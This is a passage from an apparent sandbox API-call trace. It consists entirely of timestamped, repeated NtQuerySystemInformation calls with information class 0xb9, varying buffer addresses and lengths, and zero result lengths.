ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x20, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.201] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0271.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.202] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.205] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0271.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0271.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0271.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0271.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.222] 